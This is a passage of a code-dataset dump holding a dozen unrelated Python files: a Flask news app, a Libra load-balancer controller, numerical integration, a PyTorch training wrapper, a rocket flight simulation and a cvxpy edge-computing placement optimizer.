[1, 0], [1, 1], [2, 0], [2, 1]]\n    \n    Thus, each element of range(3) is combined with each element of\n    range(2). 
Yielding 2*3 element combinations.\n    The number of arguments is free.\n    '''\n    total = reduce(lambda x,y:x*y, sizes)\n    \n    limit=10000000\n    if total > limit: raise ValueError('The number of combinations would exceed the limit %d' %limit)\n    \n    data=[[]]\n    for size in sizes:\n        cache=[]\n        for part in data:\n            for i in range(size):\n                cache.append(part + [i])\n        data = cache[:]\n    \n    assert len(data) == total\n    return data\n","sub_path":"code/ruzicka/combinations.py","file_name":"combinations.py","file_ext":"py","file_size_in_byte":4154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"6720691","text":"# Copyright 2013 Hewlett-Packard Development Company, L.P.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n#    http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom libra.mgm.controllers.build import BuildController\nfrom libra.mgm.controllers.delete import DeleteController\nfrom libra.mgm.controllers.vip import BuildIpController, AssignIpController\nfrom libra.mgm.controllers.vip import RemoveIpController, DeleteIpController\nfrom libra.openstack.common import log\n\n\nLOG = log.getLogger(__name__)\n\n\nclass PoolMgmController(object):\n\n    ACTION_FIELD = 'action'\n    RESPONSE_FIELD = 'response'\n    RESPONSE_SUCCESS = 'PASS'\n    RESPONSE_FAILURE = 'FAIL'\n\n    def __init__(self, json_msg):\n        self.msg = json_msg\n\n    def run(self):\n        if self.ACTION_FIELD not in self.msg:\n            LOG.error(\"Missing `{0}` value\".format(self.ACTION_FIELD))\n            self.msg[self.RESPONSE_FIELD] = self.RESPONSE_FAILURE\n            return self.msg\n\n        action = self.msg[self.ACTION_FIELD].upper()\n\n        try:\n            if action == 'BUILD_DEVICE':\n                controller = BuildController(self.msg)\n            elif action == 'DELETE_DEVICE':\n                controller = DeleteController(self.msg)\n            elif action == 'BUILD_IP':\n                controller = BuildIpController(self.msg)\n            elif action == 'ASSIGN_IP':\n                controller = AssignIpController(self.msg)\n            elif action == 'REMOVE_IP':\n                controller = RemoveIpController(self.msg)\n            elif action == 'DELETE_IP':\n                controller = DeleteIpController(self.msg)\n            else:\n                LOG.error(\n                    \"Invalid `{0}` value: {1}\".format(\n                        self.ACTION_FIELD, action\n                    )\n                )\n                self.msg[self.RESPONSE_FIELD] = self.RESPONSE_FAILURE\n                return self.msg\n            self.msg = controller.run()\n            # Delete a built device if it has failed\n            if (\n                action == 'BUILD_DEVICE'\n                and self.msg[self.RESPONSE_FIELD] == self.RESPONSE_FAILURE\n                and 'name' in self.msg\n            ):\n                delete_msg = {'name': self.msg['name']}\n                controller = DeleteController(delete_msg)\n                controller.run()\n\n            return self.msg\n        except Exception:\n            LOG.exception(\"Controller exception\")\n            self.msg[self.RESPONSE_FIELD] = self.RESPONSE_FAILURE\n            return self.msg\n","sub_path":"libra/mgm/controllers/root.py","file_name":"root.py","file_ext":"py","file_size_in_byte":2967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"262812162","text":"from flask import render_template, request, redirect, url_for\nfrom . 
import main\nfrom ..requests import get_topnews, get_categories, get_newsupdates\n\n #Views\n@main.route('/') \ndef index():\n '''\n View root page function that returns the index page and its data\n '''\n #Getting top news and categorically arranged news\n top_articles = get_topnews('google-news')\n print(top_articles)\n biz_articles = get_categories('business')\n tech_articles = get_categories('technology')\n ent_articles = get_categories('entertainment')\n sprt_articles = get_categories('sports')\n title = '4REAL NEWS'\n return render_template('index.html', title = title, google_news = top_articles, biz = biz_articles, tech = tech_articles, ent = ent_articles, sprt = sprt_articles)\n\n\n@main.route('/update/')\ndef article(id):\n detz_articles = get_newsupdates(id)\n# print(detz_articles)\n return render_template('news.html',detz = detz_articles)","sub_path":"app/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"428312223","text":"\ndef transmitter(a, k):\n if len(a) == 0:\n return 0\n if len(a) == 1:\n return 1\n count = 0\n m = 0\n l = 0\n r = 0\n while m < len(a):\n if m == len(a) - 1:\n return count + 1\n while m < len(a) - 1 and a[m+1] - k <= a[l]:\n m+=1\n while r < len(a) - 1 and a[m] + k >= a[r+1]:\n r+=1\n m = r + 1\n l = m\n r = m\n count+=1\n return count\n\na = [7,2,4,6,5,9,12,11]\n# a = [1,2,3,4,5]\na.sort()\nn = 2\n\nprint(transmitter(a, n))\n","sub_path":"geeks4geeks/search/radio-transmitter.py","file_name":"radio-transmitter.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"650901935","text":"import unittest\nfrom mock import MagicMock, call, ANY\n\nfrom scanpointgenerator import LineGenerator, CompoundGenerator\n\nfrom malcolm.modules.demo.parts import ScanTickerPart\nfrom malcolm.core import call_with_params, Context\n\n\nclass AlmostFloat:\n def __init__(self, val, delta):\n self.val = val\n self.delta = delta\n\n def __eq__(self, other):\n return abs(self.val - other) <= self.delta\n\n\nclass TestScanTickerPart(unittest.TestCase):\n\n def setUp(self):\n self.context = MagicMock(spec=Context)\n self.o = call_with_params(ScanTickerPart, name=\"AxisTwo\", mri=\"mri\")\n\n def prepare_half_run(self):\n line1 = LineGenerator('AxisOne', 'mm', 0, 2, 3)\n line2 = LineGenerator('AxisTwo', 'mm', 0, 2, 2)\n compound = CompoundGenerator([line1, line2], [], [], 1.0)\n compound.prepare()\n call_with_params(self.o.configure, ANY, 0, 2, MagicMock(),\n generator=compound, axesToMove=['AxisTwo'])\n\n def test_configure(self):\n self.prepare_half_run()\n assert self.o.completed_steps == 0\n assert self.o.steps_to_do == 2\n\n def test_run(self):\n self.prepare_half_run()\n update_completed_steps = MagicMock()\n self.o.run(self.context, update_completed_steps)\n assert self.context.mock_calls == [\n call.block_view(\"mri\"),\n call.block_view().counter.put_value(0),\n call.sleep(AlmostFloat(1.0, delta=0.05)),\n call.block_view().counter.put_value(2),\n call.sleep(AlmostFloat(2.0, delta=0.1))]\n","sub_path":"tests/test_modules/test_demo/test_scantickerpart.py","file_name":"test_scantickerpart.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"102791202","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 15 17:34:55 2020\n\n@author: akswa\n\"\"\"\nimport 
numpy as np\nimport sys\nimport matplotlib.pyplot as plt\n\ndef trapezoidal_rule(f,a,b,n, vect = True):\n \"\"\"\n This function implements the trapezoidal rule for integral approximation\n\n Parameters\n ----------\n f : TYPE: Function\n DESCRIPTION: Function to integrate\n a : TYPE: Float\n DESCRIPTION: Lower bound on integral\n b : TYPE: Float\n DESCRIPTION: Upper bound on integral\n n : TYPE: Integer\n DESCRIPTION: Number of gridpoints\n\n Returns\n -------\n None.\n\n \"\"\"\n \n h = (b-a)/(n)\n x = np.linspace(a,b,n+1)\n \n #Trapezoidal Rule Vectorized\n if vect:\n I_vect = h*f(x)\n I_vect[0] = I_vect[0]/2\n I_vect[-1] = I_vect[-1]/2\n I = sum(I_vect)\n \n # Nonvectorized Trapezoidal Rule\n else:\n I = (1/2)*h*(f(x[0]) + f(x[-1]))\n for i in range(1,n):\n I += h*f(x[i])\n \n \n return I,h\n\ndef debye_trap_approx():\n k = 1.38064852 * 10**-23 # Boltzman's Constant\n N = 6.022 * 10**23\n thetaD = 309 # Debye temperature\n T_i = 1 # We cut off T = 0 since integral in indefinite for T = 0\n T_f = 1083\n f = lambda x: (x**4) * np.exp(x) / (np.exp(x)-1)**2 # Define Function for integration\n eps = sys.float_info.epsilon # System epsilon\n \n T_range = np.linspace(T_i,T_f,1000)\n C_range = []\n # Evaluate Integral from T_i to T_k\n for T in T_range:\n # We use eps instead of 0 for lower bound since f is undef for 0\n C = 9*k*N*T**3/thetaD**3 * trapezoidal_rule(f,eps,thetaD/T,5000)[0] \n C_range.append(C)\n \n # Plotting\n plt.plot(T_range,C_range)\n plt.xscale(\"log\")\n \n \n return\n\n\n\nif __name__ == '__main__':\n #f = lambda x: x**2\n #a = 0\n #b = 3\n #n = 50\n #I,h = trapezoidal_rule(f, a, b, n)\n #print(I,h**2)\n \n debye_trap_approx()\n ","sub_path":"hw1/old/exC.py","file_name":"exC.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"458355055","text":"# encoding: utf-8\n\n\"\"\"A basic AMF Dialect class.\"\"\"\n\nimport web\n\nfrom functools import wraps\nfrom web.rpc import route\n\ntry:\n import pyamf.remoting.gateway\nexcept ImportError: # pragma: no cover\n raise ImportError(\"If you want to use the AMFController class, you must install PyAMF.\")\n\n\n__all__ = ['AMFController']\nlog = __import__('logging').getLogger(__name__)\n\n\nclass AMFController(web.core.Dialect):\n __gateway__ = dict()\n\n def __init__(self):\n self._gateway = pyamf.remoting.gateway.BaseGateway(logger=log, *self.__gateway__)\n\n def _call(self, fn, parent):\n @wraps(fn)\n def inner(*args, **kw):\n callback = getattr(parent, '__before__', None)\n if callback:\n args = parent.__before__(*args)\n\n result = fn(*args, **kw)\n\n callback = getattr(parent, '__after__', None)\n if callback:\n result = parent.__after__(result, *args)\n\n return result\n\n return inner\n\n def __call__(self, request):\n pyamf_request = pyamf.remoting.decode(request.body)\n pyamf_response = pyamf.remoting.Envelope(pyamf_request.amfVersion)\n\n for name, message in pyamf_request:\n # Dynamically build mapping.\n # This introduces a performance hit on the first request of each method.\n if message.target not in self._gateway.services:\n fn, parent = route(self, message.target, AMFController)\n self._gateway.addService(self._call(fn, parent), message.target)\n\n pyamf_response[name] = self._gateway.getProcessor(message)(message)\n\n web.core.response.headers['Content-Type'] = pyamf.remoting.CONTENT_TYPE\n\n return 
pyamf.remoting.encode(pyamf_response).getvalue()\n","sub_path":"web/rpc/amf.py","file_name":"amf.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"347172473","text":"class Solution(object):\n    def twoSum(self, nums, target):\n        \"\"\"\n        :type nums: List[int]\n        :type target: int\n        :rtype: List[int]\n        \"\"\"\n        \"\"\"\n        index1=0\n        index2=1\n        while index1<=len(nums)-2:\n            k=nums[index1]\n            index2=index1+1\n            while index2<=len(nums)-1:\n                if k+nums[index2]==target:\n                    return index1+1, index2+1\n                else:\n                    index2+=1\n            index1+=1\n        \"\"\"\n        # hash-map version: store each number's index, look up the complement\n        dic = {}\n        for i, num in enumerate(nums):\n            rest = target - num\n            if rest in dic:\n                # indices are returned 1-based, like the brute-force version above\n                return dic[rest] + 1, i + 1\n            dic[num] = i\n        return 0\n","sub_path":"script/two_sum.py","file_name":"two_sum.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"123911788","text":"naam = 'Mark Rutte'\nplaats = 'Den Haag'\nprint('Mijn naam is ' + naam + ' en ik woon in ' + plaats)\nprint('Mijn naam is {} en ik woon in {} '.format(naam, plaats))\nleeftijd1 = 17\nleeftijd2 = 18\nsom = (leeftijd1 + leeftijd2)\nprint('De som van de leeftijden is {}'.format(som))\n\nweekdag = 'dinsdag'\ndag = 25\nmaand = 'maart'\nuur = 14\nminuten = 15\nprint('{} {} {} '.format(weekdag, dag, maand))\nprint('{} {} {} om {}.{} uur'.format(weekdag, dag, maand, uur, minuten))","sub_path":"les05/oefening5_3.py","file_name":"oefening5_3.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"322836762","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Apr 4 09:23:59 2016\r\n\r\n@author: smcint\r\n\"\"\"\r\n\r\nfor i in [1]:#range(sf.Nsol-1):\r\n    L2D,L3D,r,z = sf.connection('core2',i)\r\n    \r\n    pl.plot(r,z)\r\n    pl.plot(r[0],z[0],'o')\r\n    pl.plot(r[30],z[30],'o')\r\n    \r\npl.axis('equal')\r\n\r\n","sub_path":"etna/core_connection.py","file_name":"core_connection.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"369109196","text":"# -*- coding: utf-8 -*-\n\"\"\" \nClass used to wrap a neural network used for a classification task. \nImplements utility functions to train, test, predict, cross-validate, etc. \nthe neural network. \"\"\"\n\nimport torch\nfrom torch import nn\nfrom torch import optim\nfrom sklearn.model_selection import KFold\n\nimport os\n\nfrom copy import deepcopy\n\nfrom callbacks import *\n\nclass History():\n    def __init__(self):\n        self.num_epochs = 0\n        self.train_losses = []\n        self.test_losses = []\n    \n    def new_epoch(self, train_loss, test_loss=None):\n        self.num_epochs += 1\n        self.train_losses.append(train_loss)\n        self.test_losses.append(test_loss)\n    \nclass modelWrapper(nn.Module):\n    \"\"\" \n    Wrap a neural network class. \n    \n    The subclass should specify the following parameters (to be initialized in the __init__):\n    - self.features: \n        
torch.nn.Sequential(...)) used to preprocess\n the data.\n - self.num_features:\n an integer indicating how many features will be extracted by self.features\n and used to reshape the data before feeding it to the self.classifier.\n - self.classifier:\n after reshaping the data into (#samples, self.num_features) it is fed to \n self.classifier (of class torch.nn.Model) which should contain fully connected \n layers and provide the final output of the forward pass.\n - self.criterion: \n cost function used (e.g. torch.nn.CrossEntropyLoss())\n #- self.optimizer: \n # optimizer that will update the parameters based on \n # the computed gradients (e.g. torch.optim.Adam(self.parameters()))\n \"\"\"\n \n def __init__(self, \n nb_hidden=50, \n activation=nn.ReLU, \n optimizer=optim.Adam, \n weight_decay=0, \n dropout=0.1, \n nb_layers=1 # number of additional layers\n ):\n super(modelWrapper, self).__init__()\n self.history = History()\n self.dir_path = \"storage/\" + self.__class__.__name__\n \n self.setting = {\n \"nb_hidden\": nb_hidden,\n \"activation\": activation,\n \"optimizer\": optimizer,\n \"weight_decay\": weight_decay,\n \"dropout\": dropout,\n \"nb_layers\": nb_layers\n }\n \n def fit(self, X_train, y_train, \n X_test=None, y_test=None, \n batch_size=20, \n epochs=25, \n verbose=True,\n callbacks=[],\n shuffle=True\n ):\n \"\"\" Fit the model on the training data.\n Input:\n - X_train: Variable containing the input of the train data.\n shape=(#train_samples, #dimensions)\n - y_train: Variable containing the target of the train data. \n shape=(#train_samples) or, if the criterion chosen \n expects one-hot encoding, shape=(#train_samples, #classes).\n - X_test: Variable containing the input of the test data. \n shape=(#test_samples, #dimensions)\n - y_test: Variable containing the the target of the test data.\n shape=(#train_samples) or, if the criterion chosen \n expects one-hot encoding, shape=(#train_samples, #classes).\n If X_test and y_test are given then then also the test \n error is computed and printed at each epoch.\n - batch_size: Integer representing the number of samples per \n gradient update.\n - epochs: Integer representing the number of epochs (#iterations \n over the entire X_train and y_train data provided) to train \n the model.\n - verbose: boolean indicating whether or not print a log to the standard\n output.\n - callbacks: list classes that will be called during training \n at each epoch and at the end of the training.\n - shuffle: if True. 
the train set is shuffled at each epoch.\n \"\"\"\n # ----- initialize the callbacks\n callbacks = [c(self) for c in callbacks]\n \n compute_test_err = X_test is not None and y_test is not None\n \n lowest_loss = float('inf')\n best_model = self.state_dict()\n # use \"try\" so that if the training stops or gets interrupted I still save the best model \n # and the intermediary predictions\n try:\n for e in range(1, epochs+1):\n if shuffle:\n indices_perm = torch.randperm(X_train.shape[0])\n X_train = X_train[indices_perm]\n y_train = y_train[indices_perm]\n \n sum_loss_train = 0\n num_batches = 0\n for b in range(0, X_train.size(0), batch_size): \n num_batches += 1\n output = self(X_train[b : b+batch_size])\n loss = self.criterion(output, y_train[b : b+batch_size])\n\n if torch.__version__ == '0.4.0':\n sum_loss_train += loss.item() # under 0.4.0 the loss is a 0-dim tensor\n else:\n sum_loss_train += loss.data[0]\n self.zero_grad()\n loss.backward()\n self.optimizer.step()\n \n sum_loss_train = sum_loss_train/num_batches\n \n test_loss = None\n if compute_test_err:\n test_loss = self.criterion(self(X_test), y_test).data\n test_loss = test_loss.item() if torch.__version__ == '0.4.0' else test_loss[0]\n self.history.new_epoch(sum_loss_train, test_loss)\n\n if verbose:\n print(\n \"Epoch \" + str(e) + \"/\" + str(epochs) + \": \" +\n \"Train loss:\", str(sum_loss_train) + \". \" + \n 'Train accuracy {:0.2f}%'.format(self.score(X_train, y_train)*100) + \". \" +\n ('Test accuracy {:0.2f}%'.format(self.score(X_test, y_test)*100) if compute_test_err else \"\"))\n \n # ----- call the callbacks classes (update their internal state)\n for callback in callbacks:\n callback()\n finally:\n # ----- finalize the callbacks classes (which may store to file their state) \n for callback in callbacks:\n callback.end()\n \n return self\n \n def compute_nb_errors(self, X, y):\n \"\"\" Compute the number of misclassified samples. \"\"\"\n self.eval()\n \n predicted_classes = self.predict(X)\n true_classes = y.data.max(1)[1] if y.dim() == 2 else y.data # if one-hot encoding then extract the class\n \n nb_errors = (true_classes != predicted_classes).sum()\n\n self.train()\n return nb_errors\n\n def predict(self, X):\n \"\"\" Predict the label of the samples in X. \"\"\"\n self.eval()\n \n predictions = self(X).data.max(1)[1]\n \n self.train()\n return predictions\n \n def score(self, X, y):\n \"\"\" Compute the accuracy. \"\"\"\n self.eval()\n \n true_classes = y.data.max(1)[1] if y.dim() == 2 else y.data # if one-hot encoding then extract the class\n pred_classes = self.predict(X)\n \n score = (pred_classes==true_classes).sum()\n \n if torch.__version__ == '0.4.0':\n score = score.item()\n \n score = score/X.shape[0]\n \n self.train()\n return score\n \n def forward(self, x):\n \"\"\" Do the forward pass. \"\"\"\n \n x = self.features(x)\n \n x = x.view(-1, self.num_features)\n \n x = self.classifier(x)\n return x\n \n def cross_validate(self, X, y, n_splits=4, epochs=100, verbose=False):\n \"\"\" Run cross validation on the model and return the obtained test and train scores. 
\"\"\"\n \n kf = KFold(n_splits=n_splits, random_state=1, shuffle=True)\n tr_scores = []\n va_scores = []\n\n result = {\n \"train_score\": [],\n \"test_score\" : []\n }\n\n split_n = 1\n i = 0\n for tr_indices, va_indices in kf.split(X):\n i+=1\n if verbose: \n print(\"----------------- fold \" + str(i) + \"/\" + str(n_splits) + \" -----------------\")\n tr_indices = tr_indices.tolist()\n va_indices = va_indices.tolist()\n X_tr, y_tr = X[tr_indices], y[tr_indices]\n X_te, y_te = X[va_indices], y[va_indices]\n\n self.clear()\n self.fit(X_tr, y_tr, X_te, y_te, epochs=epochs, verbose=verbose, callbacks=[keep_best_model])\n\n result[\"train_score\"].append(self.score(X_tr, y_tr))\n result[\"test_score\"].append(self.score(X_te, y_te))\n\n return result\n \n def save_model(self, model_state=None):\n \"\"\" Save the model to /model. \"\"\"\n \n if model_state is None:\n model_state = self.state_dict()\n \n self.save_data(model_state, \"model\")\n return self\n \n def load_model(self):\n \"\"\" Load the model parameters from /model. \"\"\" \n self.load_state_dict(self.load_data(\"model\"))\n return self\n\n def save_data(self, data, file_path=\"data\", pickle_protocol=2):\n \"\"\" Save the passed list of predictions to /. \"\"\"\n file_path = self.dir_path + \"/\" + file_path\n dir_path = os.path.dirname(file_path)\n \n if not os.path.exists(dir_path):\n os.makedirs(dir_path)\n \n torch.save(data, file_path, pickle_protocol=pickle_protocol)\n return self\n \n def load_data(self, file_path=\"data\"):\n \"\"\" Load and return the list of predictions from /. \"\"\"\n \n file_path = self.dir_path + \"/\" + file_path\n \n if not os.path.isfile(file_path):\n raise Exception(\"Could not find the file:\" + file_path)\n \n return torch.load(file_path)\n \n def clear(self):\n \"\"\" Reinitialize the network (used during cross validation).\"\"\"\n device = next(self.parameters()).device\n \n self.__init__(**self.setting)\n self.to(device)\n","sub_path":"modelWrapper.py","file_name":"modelWrapper.py","file_ext":"py","file_size_in_byte":10553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"386815898","text":"# System modules\nimport sys # System utilities\nfrom pathlib import Path\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\n\n# Path modifications\npaths = [\"../build/src\", \"../src/preproc\", \"../src/util\"]\n\nfor item in paths:\n addPath = Path(__file__).parent / item\n sys.path.append(str(addPath.resolve()))\n\n#-----------------------------------------------------------------------------#\n\nimport preproc_engine\nimport model\n\n# Initialize engine model\ntime, thrust, mass = preproc_engine.load(\"../input/engine/AeroTech_J450DM.eng\")\n\neng = model.Engine()\neng.init(time, thrust, mass)\n\n# Initialize mass model\nmass = model.Mass()\nmass.init(5)\nmass.add_dep(eng)\n\n# Initialize geodetic model\n# SARA launch site: (32.269798483027344, -111.27475082401067)\nlat = 32.2698\nlat *= math.pi/180\n\ngeo = model.Geodetic()\ngeo.init(lat)\n\n# Initialize EOM model\neom = model.EOM()\neom.init()\n\neom.add_dep(eng)\neom.add_dep(mass)\neom.add_dep(geo)\n\n# Initialize flight\nflt = model.Flight()\nflt.add_dep(eom)\n\nt0 = 0.0\ndt = 0.01\ntf = 50.0\n\nflt.init(t0, dt, tf)\n\nflt.update()\nflt.write_telem(\"../output/test.csv\")","sub_path":"tools/test_flight.py","file_name":"test_flight.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} 
+{"seq_id":"118310696","text":"import math\nimport copy\nimport service\nimport matplotlib\nimport cvxpy as cp\nimport numpy as np\nimport multiprocessing\nimport computation_node\nfrom itertools import repeat\nimport matplotlib.pyplot as plt\n\nC = 6e7\nETA = 0.9\n\ndef propagationDelay(point1, point2):\n return math.hypot(point1[0] - point2[0], point1[1] - point2[1]) / C\n\ndef getComputNodeDelay(srcDst, computeNode):\n tau = 0\n if computeNode.type == \"edge\" or computeNode.type == \"Edge\":\n tau += propagationDelay(srcDst[\"position\"], srcDst[\"switch\"][\"position\"])\n tau += propagationDelay(computeNode.position, computeNode.switch[\"position\"])\n tau += srcDst[\"switch\"][\"delay\"]\n if srcDst[\"switch\"] != computeNode.switch:\n tau += computeNode.switch[\"delay\"]\n tau += propagationDelay(srcDst[\"switch\"][\"position\"], srcDst[\"switch\"][\"parent\"][\"position\"])\n tau += propagationDelay(computeNode.switch[\"position\"], computeNode.switch[\"parent\"][\"position\"])\n tau += srcDst[\"switch\"][\"parent\"][\"delay\"]\n if srcDst[\"switch\"][\"parent\"] != computeNode.switch[\"parent\"]:\n tau += computeNode.switch[\"parent\"][\"delay\"]\n tau += propagationDelay(srcDst[\"switch\"][\"parent\"][\"position\"], srcDst[\"switch\"][\"parent\"][\"parent\"][\"position\"])\n tau += propagationDelay(computeNode.switch[\"parent\"][\"position\"], computeNode.switch[\"parent\"][\"parent\"][\"position\"])\n tau += srcDst[\"switch\"][\"parent\"][\"parent\"][\"delay\"]\n if srcDst[\"switch\"][\"parent\"][\"parent\"] != computeNode.switch[\"parent\"][\"parent\"]:\n tau += computeNode.switch[\"parent\"][\"parent\"][\"delay\"]\n tau += propagationDelay(srcDst[\"switch\"][\"parent\"][\"parent\"][\"position\"], computeNode.switch[\"parent\"][\"parent\"][\"position\"])\n elif computeNode.type == \"cloud\" or computeNode.type == \"Cloud\":\n tau += propagationDelay(srcDst[\"position\"], srcDst[\"switch\"][\"position\"])\n tau += srcDst[\"switch\"][\"delay\"]\n tau += propagationDelay(srcDst[\"switch\"][\"position\"], srcDst[\"switch\"][\"parent\"][\"position\"])\n tau += srcDst[\"switch\"][\"parent\"][\"delay\"]\n tau += propagationDelay(srcDst[\"switch\"][\"parent\"][\"position\"], srcDst[\"switch\"][\"parent\"][\"parent\"][\"position\"])\n tau += srcDst[\"switch\"][\"parent\"][\"parent\"][\"delay\"]\n if srcDst[\"switch\"][\"parent\"][\"parent\"] != computeNode.switch:\n tau += computeNode.switch[\"delay\"]\n tau += propagationDelay(srcDst[\"switch\"][\"parent\"][\"parent\"][\"position\"], computeNode.switch[\"position\"])\n tau += propagationDelay(computeNode.position, computeNode.switch[\"position\"])\n else:\n raise Exception(\"{} not found\".format(computeNode.type))\n return tau\n\nclass Simulator:\n def __init__(self, name, d, switches, epsilon = 1):\n self.name = name\n self.switches = switches\n for list1, list2 in zip(self.switches[0:2], self.switches[1:3]):\n for switch1 in list1:\n distances = [(switch1[\"position\"][0]-switch2[\"position\"][0])**2+(switch1[\"position\"][1]-switch2[\"position\"][1])**2 for switch2 in list2]\n switch2 = list2[distances.index(min(distances))]\n switch1[\"parent\"] = switch2\n self.computationNodes = []\n self.services = []\n self.totalUtilityList = []\n self.roundCount = 0\n self.utilityValue = 1e12\n self.I = []\n self.epsilon = epsilon\n\n def getSwitch(self, position, level=0):\n switches = self.switches[level]\n distances = [math.hypot(switch[\"position\"][0]-position[0], switch[\"position\"][1]-position[1]) for switch in switches]\n switch = 
switches[distances.index(min(distances))]\n return switch\n\n def addNode(self, C, U, position):\n switch = self.getSwitch(position)\n newNode = computation_node.ComputationNode(index=len(self.computationNodes), C=C, U=U, type=\"Edge\", switch=switch, position=position)\n self.computationNodes.append(newNode)\n\n def addCloud(self, numberOfResources, C, U=0.1, position=[0,0]):\n switch = self.getSwitch(position, level=2)\n for index in range(numberOfResources):\n newNode = computation_node.ComputationNode(index=len(self.computationNodes), C=C, U=U, type=\"Cloud\", switch=switch, position=position, Q=40)\n self.computationNodes.append(newNode)\n\n def addService(self, F, R, alpha, w, center, sources, destinations):\n src = [{\"position\": s, \"switch\": self.getSwitch(s)} for s in sources]\n dst = [{\"position\": d, \"switch\": self.getSwitch(d)} for d in destinations]\n newService = service.Service(index=len(self.services), F=F, R=R, alpha=alpha, w=w, center=center, sources=src, destinations=dst, simulator=self)\n self.services.append(newService)\n\n def nameLessFunction(self, I, logLevel=0, verbose=False):\n \"\"\" Solve the convex rate/utilization/delay subproblem for a fixed placement matrix I. \"\"\"\n try:\n r = cp.Variable((len(self.computationNodes), len(self.services)))\n u = cp.Variable((len(self.computationNodes), len(self.services)))\n d = cp.Variable((len(self.computationNodes), len(self.services)))\n rTotal = cp.Variable(len(self.services))\n dMax = cp.Variable(len(self.services))\n obj = None\n constraints = []\n for service in self.services:\n s = service.index\n alpha = service.alpha\n if I[:,s].any():\n rates = None\n for node in self.computationNodes:\n i = node.index\n if I[i,s] == True:\n if rates is None:\n rates = r[i,s]\n else:\n rates += r[i,s]\n constraints.append(0 <= r[i,s])\n constraints.append(r[i,s] <= ETA*u[i,s]*node.U*node.C/service.F)\n constraints.append(-cp.log(u[i,s]*node.U*node.C/service.F-r[i,s]) <= cp.log(d[i,s]-service.tau[i]))\n constraints.append(d[i,s] <= dMax[s])\n constraints.append(rTotal[s] == rates)\n serviceObj = service.alpha*((service.w*cp.abs(rTotal[s]-service.R)) + (1-service.w)*dMax[s])\n else:\n serviceObj = service.alpha*service.w*service.R\n if obj is None:\n obj = serviceObj\n else:\n obj += serviceObj\n for node in self.computationNodes:\n i = node.index\n us = None\n if I[i,:].any():\n for service in self.services:\n s = service.index\n if I[i,s] == True:\n if us is None:\n us = u[i,s]\n else:\n us += u[i,s]\n constraints.append(us <= 1)\n objective = cp.Minimize(obj)\n prob = cp.Problem(objective, constraints)\n result = prob.solve(solver=\"ECOS\", verbose=False)\n if logLevel > 3:\n print(\"problem:\")\n# print(prob)\n print(prob.status)\n print(\"value:\", prob.value)\n print(\"r:\", r.value)\n print(\"u:\", u.value)\n print(\"d:\", d.value)\n print(\"D:\", dMax.value)\n print(\"R:\", rTotal.value)\n solution = {}\n solution[\"r\"] = r.value\n solution[\"u\"] = u.value\n solution[\"d\"] = d.value\n solution[\"rTotal\"] = rTotal.value\n solution[\"dMax\"] = dMax.value\n solution[\"objective\"] = prob.value\n return (prob.value, solution)\n except Exception as e:\n print(e)\n return (1e12, None)\n\n def check(self, I, lastMin, lastMinI, logLevel=0, verbose=False):\n if logLevel > 2:\n print(\"s\\tI\")\n print(I)\n tmp = self.nameLessFunction(I=I, logLevel=logLevel, verbose=verbose)[0]\n newValue = copy.deepcopy(tmp)\n if logLevel > 1:\n print(\"candidate: {:.4}, current min: {:.4}, diff: {:.4}\".format(newValue, lastMin, lastMin - newValue))\n return (copy.deepcopy(newValue), copy.deepcopy(I)) 
if newValue < lastMin else (lastMin, lastMinI)\n\n def serviceRound(self, service, lastMin, lastMinI, logLevel=0, verbose=False):\n min = copy.deepcopy(self.utilityValue)\n minI = copy.deepcopy(self.I)\n I = copy.deepcopy(self.I)\n s = service.index\n for node in self.computationNodes:\n i = node.index\n if self.I[i,s] == True:\n I[i,s] = False\n (min, minI) = self.check(I, min, minI, logLevel, verbose)\n I[i,s] = True\n for node1 in self.computationNodes:\n i1 = node1.index\n if I[i1,s] == False:\n I[i1,s] = True\n if sum(I[:,s]) < service.Q and sum(I[i1,:]) < node1.Q:\n (min, minI) = self.check(I, min, minI, logLevel, verbose)\n for node2 in self.computationNodes:\n i2 = node2.index\n if I[i2,s] == True and i2 != i1:\n I[i2,s] = False\n (min, minI) = self.check(I, min, minI, logLevel, verbose)\n I[i2,s] = True\n I[i1,s] = False\n return (min, minI)\n\n def round(self, logLevel=0, verbose=False):\n min = copy.deepcopy(self.utilityValue)\n minI = copy.deepcopy(self.I)\n with multiprocessing.Pool() as pool:\n results = pool.starmap(self.serviceRound, zip(self.services, repeat(logLevel),repeat(verbose)))\n for result in results:\n if (result[0] < min):\n min = result[0]\n minI = result[1]\n self.roundCount += 1\n diff = 